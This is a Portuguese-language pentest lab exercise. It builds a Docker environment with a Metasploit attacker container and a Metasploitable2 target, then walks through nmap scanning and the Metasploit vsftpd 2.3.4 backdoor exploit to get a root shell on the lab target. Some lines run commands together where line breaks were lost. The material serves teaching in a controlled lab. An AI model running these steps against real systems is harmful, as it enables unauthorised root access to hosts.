✍️Atividade Prática 01

Pentest na Prática em Ambiente Controlado (Docker): Lab 01
Nesta atividade montaremos um cenário em ambiente controlado (Docker) com duas máquinas, sendo uma delas denominada 'atacante' pré-configurada com o Framework Metasploit e a outra denominada 'alvo' construída a partir da distribuição de testes Metaslplotable2.
Como o 'docker' e o plugin 'docker-compose' devidamente instalados e funcionais, execute os passos a seguir para realizar a atividade:
1) Crie um diretório para o projeto e, em seguida, baixe o arquivo docker-compose.yml contendo o nome das imagens docker que serão utilizadas e as configurações adequadas para a prática:
mkdir pentest_lab1cd pentest_lab1wget https://raw.githubusercontent.com/ricardokleber/dockers/refs/heads/main/pentest_lab1/docker-compose.ymlOpcionalmente, ao invés de baixar o arquivo, você pode criar o arquivo docker-compose.yml com o conteúdo a seguir:
services:
atacante:
image: ricardokleber/metasploit-framework:latest
container_name: atacante
networks:
my-network:
ipv4_address: 192.168.200.100
tty: true
stdin_open: true
alvo:
image: ricardokleber/metasploitable2:latest
container_name: alvo
networks:
my-network:
ipv4_address: 192.168.200.200
tty: true
stdin_open: true
networks:
my-network:
ipam:
config:
- subnet: 192.168.200.0/242) Execute o docker compose para baixar as imagens e iniciar os dockers:
docker-compose up -dApós o download das imagens, inicialização dos contêiners e configuração, o ambiente estará pronto para prática!!!
3) Acesse o contêiner atacante:
docker exec -it atacante /bin/bash4) Verifique se o contêiner 'atacante' está acessando o contêiner 'alvo':
ping 192.168.200.2005) Entre no ambiente Metasploit-Framework através da interface no modo console:
./msfconsoleA cada execução do MSF no modo console um banner diferente será exibido em ASCII ART (isso é só estético). O console indicará que você está no ambiente pronto para executar os comandos a partir de um prompt '>'.
6) Faça um Portscan no contêiner 'alvo' utilizando o NMAP embutido no MSF:
nmap 192.168.200.2007) Execute o nmap específico para a porta 21/TCP com o parâmetro -sV para tentar identificar detalhes sobre o servidor FTP alvo:
nmap -sT -p 21 192.168.200.200 -sV8) Faça uma busca no MSF por um exploit para o serviço escolhido (vsftp)
search vsftpd9) Selecione o exploit indicado na busca como 'excelent:
use exploit/unix/ftp/vsftpd_234_backdoor10) Exiba as opções de configuraçãodo exploit:
show options11) Só é necessário configurar o 'Remote Host' (Alvo) RHOSTS:
set RHOSTS 192.168.200.20012) Finalmente, execute o exploit!!!
runOs comandos digitados nessa "shell reversa" estaráo agora sendo executados (com permissão de superusuário root) na máquina alvo!!!
13) Execute comandos na máquina-alvo para comprovar que o ataque foi bem sucedido
whoamihostnameifconfigVocê realizou (com sucesso) um ataque contra um servidor com uma versão vulnerável do servidor FTP vsftpd (versão 2.3.4) e usando um exploit do MSF explorou a vulnerabilidade para acessar a máquina como superusuário root.
Atualizado